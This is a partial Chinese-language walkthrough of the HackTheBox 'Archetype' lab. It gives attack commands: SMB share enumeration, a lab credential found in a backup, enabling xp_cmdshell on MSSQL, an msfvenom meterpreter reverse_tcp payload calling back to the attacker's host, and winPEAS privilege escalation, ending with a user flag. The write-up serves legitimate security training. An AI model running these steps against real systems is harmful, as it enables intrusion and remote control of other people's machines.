Hackthebox Archetype攻略(部分)


目标:Archetype

题目难度:本人觉得有难度

作者使用Kali Linux作为渗透测试平台,在Kali Linux上首先通过openvpn建立与Hackthebox网站的VPN连接,得到目标Archetype实例的IP地址:

 #openvpn starting_point_jasonhuawen.ovpn

# nmap -sV 10.129.5.176

用nmap工具扫描一下目标Archetype,看数据库服务运行的端口即可:

 

从nmap扫描结果可以知道目标运行共享服务,因此尝试用smbclient列出共享目录

# smbclient -L 10.129.5.176可以列出共享目录,以$结尾的是管理员权限

 

然后用smbclient登录上目标的backups目录

#smbclient //10.129.5.176/backups

发现只有一个文件,下载到本地,查看,就可以看到有有用户名和密码信息:

Username: ARCHETYPE\sql_svc

Password: M3g4c0rp123

 

接下来这道题,题目中提到了impacket工具,结果发现Kali Linux上没有安装,谷歌一下,安装很简单:

#git clone https://github.com/CoreSecurity/impacket.git

#cd impacket/

#python3 setup.py install

题目中是要建立与Microsoft SQL Server的连接,应该是mssqlclient.py脚本

 

接下来利用impacket中msclient.py脚本连接sqlserver 数据库(用户名与密码用之前smbclient下载的文件中的相关信息)

#python3 mssqlclient.py  ARCHETYPE/sql_svc@10.129.5.176 -windows-auth

成功进入数据库

 

SQL> enable_xp_cmdshell;

 

SQL> reconfigure

然后是设法建立反向代理连接,需要将载荷生成并上传到目标机器,首先用msfenom生成载荷:

#msfvenom -p  windows/meterpreter/reverse_tcp LHOST=10.10.14.218 -f exe -o jason.exe

下面关键是如何把jason.exe payload上传到目标机器

可以利用xp_cmsshell执行命令,将载荷下载到目标机器,在kali Linux上运行http服务器(用python http模块)

首先在目标机器上进入到有执行权限的目录,比如Public目录:

 

成功上传载荷到目标机器:

然后在目标机器上执行脚本jason.exe

成功回连至Kali LInux

然后需要准备提权工具winPEAS,将该文件下载到Kali Linux本地

#wgethttps://github.com/carlospolop/PEASS-ng/releases/download/20220320/winPEASx86.exe

然后通过meterpreter将winpeas上传到目标机器,并执行:

 

成功获得user的flag: 3e7b102e78218e935bf3f4951fec21a3

 

相关